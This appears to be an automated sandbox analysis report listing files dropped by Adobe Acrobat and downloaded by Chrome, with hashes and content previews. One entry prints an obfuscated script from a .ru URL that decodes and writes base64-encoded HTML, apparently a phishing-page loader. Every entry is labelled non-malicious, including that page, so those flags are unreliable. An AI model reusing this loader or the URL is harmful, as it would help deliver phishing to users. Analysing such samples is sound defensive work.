                                                                  Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"e242ec90df6207b3542583a53f790b9b","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734671934000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"5264ad20fc096db13e5239e6c1039901","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734671934000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"1ce40147ee4f74730922fb82c06b2c4b","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734671934000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"3288ea00e23aed5972fc6385b6e56c80","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734671934000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"f11cfa7b2717b90c6669814aeed47d3d","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734671934000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"03593879d9061e1b5a207f39d78064c9","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                  Category:dropped
                                                                  Size (bytes):12288
                                                                  Entropy (8bit):1.1874024832122492
                                                                  Encrypted:false
                                                                  SSDEEP:48:TGufl2GL7msEHUUUUUUUUbopSvR9H9vxFGiDIAEkGVvpFN:lNVmswUUUUUUUUQ+FGSIt7
                                                                  MD5:4D2D775E9C1C2FB28EA976CBDBCC3E0E
                                                                  SHA1:056F8D774500E74C43F3E5642A692CD8A74FFC29
                                                                  SHA-256:A47EB57E9A6CD744B6B8E11D6FA2B2C6DD3773CDC790CC708235A18FADF7B2C8
                                                                  SHA-512:3A34EE68445AD2A90637E776070DC39201DF704763EDBB9E246563336D15440EEE9E73BDB1E9B51835880A7F372D5DD878A7A30C7399E225745D9EF91923FE92
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:SQLite Rollback Journal
                                                                  Category:dropped
                                                                  Size (bytes):8720
                                                                  Entropy (8bit):1.6033953004160812
                                                                  Encrypted:false
                                                                  SSDEEP:48:7M6KUUUUUUUUUUboBvR9H9vxFGiDIAEkGVv2qFl2GL7msu:72UUUUUUUUUUuFGSItwKVmsu
                                                                  MD5:7139BC6326BF3A7941AFF0832812FC5E
                                                                  SHA1:3AF00106E278299DB9DC364BC42FF5560D5BF05C
                                                                  SHA-256:B5DA48A7A3777824791C60A0827236810135763391BDFE9E3D94CAED8A7E1918
                                                                  SHA-512:D0CB28E6B0108B7494E5E7ABE5711F275223E72F2F1790BB112A8C4280D4334C60284224AA140E76AE64C8244CF6C6C54D4400BACF1C687478D22D57A4E8D934
                                                                  Malicious:false
                                                                  Preview:.... .c......Ya.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):66726
                                                                  Entropy (8bit):5.392739213842091
                                                                  Encrypted:false
                                                                  SSDEEP:768:RNOpblrU6TBH44ADKZEgIlG6yIqMRdPRHgeECxQkjcPN1JYyu:6a6TZ44ADE8G6yIqIPlECFjMK
                                                                  MD5:5C14241CDD903881F6B553EA28DE4E4C
                                                                  SHA1:E9CAB3743D7B1E42612C511F3DD1A901A8795EA1
                                                                  SHA-256:F3047E1BE93816BD66D70619C3B2324403CAF900382614D519CC28B550088AC8
                                                                  SHA-512:D32830BFF096FF59BDCE4BDECCC5914F2D7DDCC591409DCB63DE11DA2992A87C72E9BFB4FFF6E4F6E41FFB33A77324A34DF659BBEB45674FC0BE793A0D0CBEE5
                                                                  Malicious:false
                                                                  Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):246
                                                                  Entropy (8bit):3.503482856767026
                                                                  Encrypted:false
                                                                  SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8QO6/laCH:Qw946cPbiOxDlbYnuRKZOKACH
                                                                  MD5:4C68558DF50EA1E71BEE353688598D95
                                                                  SHA1:AF720B11FA292B82E790C2F92B04127029AAB638
                                                                  SHA-256:05F9543C8771A53C51E90F81C63E7F406E64199E8E38E0380DFBB0717E25FD67
                                                                  SHA-512:C7C0C6D4840B172F4B14175919CA1624DEDE61EB131F10B519424FE44C1EFE5092A1BFD8FED1222FFDE70C4A144410C3951E6CE73E7A0BD80DDB0C7726775D2D
                                                                  Malicious:false
                                                                  Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.0./.1.2./.2.0.2.4. . .0.0.:.1.8.:.5.2. .=.=.=.....
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:PDF document, version 1.6, 0 pages
                                                                  Category:dropped
                                                                  Size (bytes):358
                                                                  Entropy (8bit):5.025775375003079
                                                                  Encrypted:false
                                                                  SSDEEP:6:IngVMrexJzJT0y9VEQIFVmb/eu2g/86S1kxROOydefse5uLCSyAAO:IngVMre9T0HQIDmy9g06JXidKaLlX
                                                                  MD5:D9D96F0728A0C828DCC629D035DA2BAE
                                                                  SHA1:CDF9B24DAAB5D5EEA4C046470AD39857E6A24E99
                                                                  SHA-256:0B3A90B0A6558D75E374E7B13B7BAF241E24D7BCC33C59475F66B1E847049B47
                                                                  SHA-512:84BDD36746D6734883E83FF9250A613854A4C3B3825AE4196E572B3E0DAA5ECE339DD04CE15E383E114366029971147072862F1E798DE58635EB41B7F88D215E
                                                                  Malicious:false
                                                                  Preview:%PDF-1.6.%......1 0 obj.<</Pages 2 0 R/Type/Catalog>>.endobj.2 0 obj.<</Count 0/Kids[]/Type/Pages>>.endobj.3 0 obj.<<>>.endobj.xref..0 4..0000000000 65535 f..0000000016 00000 n..0000000061 00000 n..0000000107 00000 n..trailer..<</Size 4/Root 1 0 R/Info 3 0 R/ID[<AF498319C63D2B44A743612004CD41D1><AF498319C63D2B44A743612004CD41D1>]>>..startxref..127..%%EOF..
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:ASCII text, with very long lines (393)
                                                                  Category:dropped
                                                                  Size (bytes):16525
                                                                  Entropy (8bit):5.345946398610936
                                                                  Encrypted:false
                                                                  SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                                                  MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                                                  SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                                                  SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                                                  SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                                                  Malicious:false
                                                                  Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):16603
                                                                  Entropy (8bit):5.316570993573984
                                                                  Encrypted:false
                                                                  SSDEEP:384:YdhshxRQHVeGeY/jF46RnpYNtiloglZvW99xHrXOXx09nZm0EDDzW5WflXdgZgAM:GgIj
                                                                  MD5:6A3D2C5AA95000B410C5AB7EFEBF6858
                                                                  SHA1:131848DB687156993C43CAB0800E337D2AB16A84
                                                                  SHA-256:4212783315617B75A7F91AC955532D9F19578C3A7570F951902CB6D236781CCE
                                                                  SHA-512:29E2D93630FD8325B979BB0C2C8BC016AA3E4A0641C8FA769581A0B92B1F918DF8B946F87CE018EB6C938A668AE09AB916FC1C1820EB7FAF5E84EE2C83A53090
                                                                  Malicious:false
                                                                  Preview:SessionID=30c706ac-2f6a-4f70-ac0f-02c43001149f.1734671926921 Timestamp=2024-12-20T00:18:46:921-0500 ThreadID=2180 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=30c706ac-2f6a-4f70-ac0f-02c43001149f.1734671926921 Timestamp=2024-12-20T00:18:46:922-0500 ThreadID=2180 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=30c706ac-2f6a-4f70-ac0f-02c43001149f.1734671926921 Timestamp=2024-12-20T00:18:46:922-0500 ThreadID=2180 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=30c706ac-2f6a-4f70-ac0f-02c43001149f.1734671926921 Timestamp=2024-12-20T00:18:46:922-0500 ThreadID=2180 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=30c706ac-2f6a-4f70-ac0f-02c43001149f.1734671926921 Timestamp=2024-12-20T00:18:46:922-0500 ThreadID=2180 Component=ngl-lib_NglAppLib Description="SetConf
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):29752
                                                                  Entropy (8bit):5.390111040941893
                                                                  Encrypted:false
                                                                  SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rU:mV4n/jF8kKWWEbxq9
                                                                  MD5:CA6985B36799CE154652D9ABF5D89413
                                                                  SHA1:3EAE92AB51E289C978BAA73280C44F84819253AF
                                                                  SHA-256:F81C15C29306E6CC6B690CBD84D82C26B419F25CF941A8C044EA78DA38FF9F47
                                                                  SHA-512:F21DDF347994E9C227DBAF9C9A55F15F8797237757D1CD636999348CF2326E9D7BFAF0F675C028602566C69664AC94369A13EA1CEA8A47EB0F468785681D468E
                                                                  Malicious:false
                                                                  Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                  Category:dropped
                                                                  Size (bytes):386528
                                                                  Entropy (8bit):7.9736851559892425
                                                                  Encrypted:false
                                                                  SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                  MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                  SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                  SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                  SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                  Malicious:false
                                                                  Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                  Category:dropped
                                                                  Size (bytes):758601
                                                                  Entropy (8bit):7.98639316555857
                                                                  Encrypted:false
                                                                  SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                  MD5:3A49135134665364308390AC398006F1
                                                                  SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                  SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                  SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                  Malicious:false
                                                                  Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                  Category:dropped
                                                                  Size (bytes):1407294
                                                                  Entropy (8bit):7.97605879016224
                                                                  Encrypted:false
                                                                  SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLcGZtwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLcGZa
                                                                  MD5:22B260CB8C51C0D68C6550E4B061E25A
                                                                  SHA1:DF9A5999C58A8D5ADBB3F8D1111EAB9E4778637E
                                                                  SHA-256:DAB1231CC22DAB591EBB91C853E3EE41C10D3DA85D2EFAB67E9A52CCB3A3A5A0
                                                                  SHA-512:503218D83C511A7F7CEA8BC171921D1435664B964F01A8C77DC0F4D0196DD2815D9444DA98278E1369552D004E9B091DD9B89663209F0C52ACB97FCE6AFFE7A9
                                                                  Malicious:false
                                                                  Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                  Category:dropped
                                                                  Size (bytes):1419751
                                                                  Entropy (8bit):7.976496077007677
                                                                  Encrypted:false
                                                                  SSDEEP:24576:/xA7owWLaGZDwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLaGZDwZGk3mlind9i4ufFXpAXkru
                                                                  MD5:18E3D04537AF72FDBEB3760B2D10C80E
                                                                  SHA1:B313CD0B25E41E5CF0DFB83B33AB3E3C7678D5CC
                                                                  SHA-256:BBEF113A2057EE7EAC911DC960D36D4A62C262DAE5B1379257908228243BD6F4
                                                                  SHA-512:2A5B9B0A5DC98151AD2346055DF2F7BFDE62F6069A4A6A9AB3377B644D61AE31609B9FC73BEE4A0E929F84BF30DA4C1CDE628915AC37C7542FD170D12DE41298
                                                                  Malicious:false
                                                                  Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text, with very long lines (65389), with CRLF line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):439312
                                                                  Entropy (8bit):3.317790330425015
                                                                  Encrypted:false
                                                                  SSDEEP:768:rFktYmG/kw9haquIvAjdDGlktYmG/kw9haquIvAjdDG5lrSlr9:RIYR/kw9hF4ZDKIYR/kw9hF4ZDuAf
                                                                  MD5:5E3F8289FE07CFFD9207CE9EAB53A055
                                                                  SHA1:A076E7CC15DC7069D19514E45D240D25078E3994
                                                                  SHA-256:860370D6D67EA908F2DDD1B8C080FAEBEA244DF4EF024A3D12E97E1D7EA308D4
                                                                  SHA-512:A229B161F22246D1A00861928B956865CEB6A6109EE30027479E9CC18AE9981541C673EAA9B02CC5955F7A4B2653CAEEFA00D04AC1BEC82C2E051DA3A80B0B07
                                                                  Malicious:false
                                                                  URL:https://8g.tolirax.ru/3JCtG/
                                                                  Preview:<script>../* Don&#039;t be afraid to give up the good to go for the great. */..if(atob("aHR0cHM6Ly84Ry50b2xpcmF4LnJ1LzNKQ3RHLw==") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4NCiAgICA8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9Im5vaW5kZXgsIG5vZm9sbG93Ij4NCiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+DQogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPg0KPHN0eWxlPg0KYm9keSwgaHRtbCB7DQptYXJnaW46IDA7DQpwYWRkaW5nOiAwOw0KaGVpZ2h0OiAxMDAlOw0Kb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCg0KLmJhY2tncm91bmQtY29udGFpbmVyIHsNCiAgICBwb3NpdGlvbjogcmVsYXRpdmU7DQogICAgaGVpZ2h0OiAxMDAlOw0KICAgIHdpZHRoOiAxMDAlOw0KfQ0KLmJhY2tncm91bmQtY29udGFpbmVyIC5iYWNrZ3JvdW5kIHsNCiAgICBjb250ZW50OiAiIjsNCiAgICBwb3NpdGlvbjogYWJzb2x1dGU7DQogICAgdG
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (65447)
                                                                  Category:dropped
                                                                  Size (bytes):89501
                                                                  Entropy (8bit):5.289893677458563
                                                                  Encrypted:false
                                                                  SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                  Malicious:false
                                                                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (65447)
                                                                  Category:downloaded
                                                                  Size (bytes):89501
                                                                  Entropy (8bit):5.289893677458563
                                                                  Encrypted:false
                                                                  SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                  Malicious:false
                                                                  URL:https://code.jquery.com/jquery-3.6.0.min.js
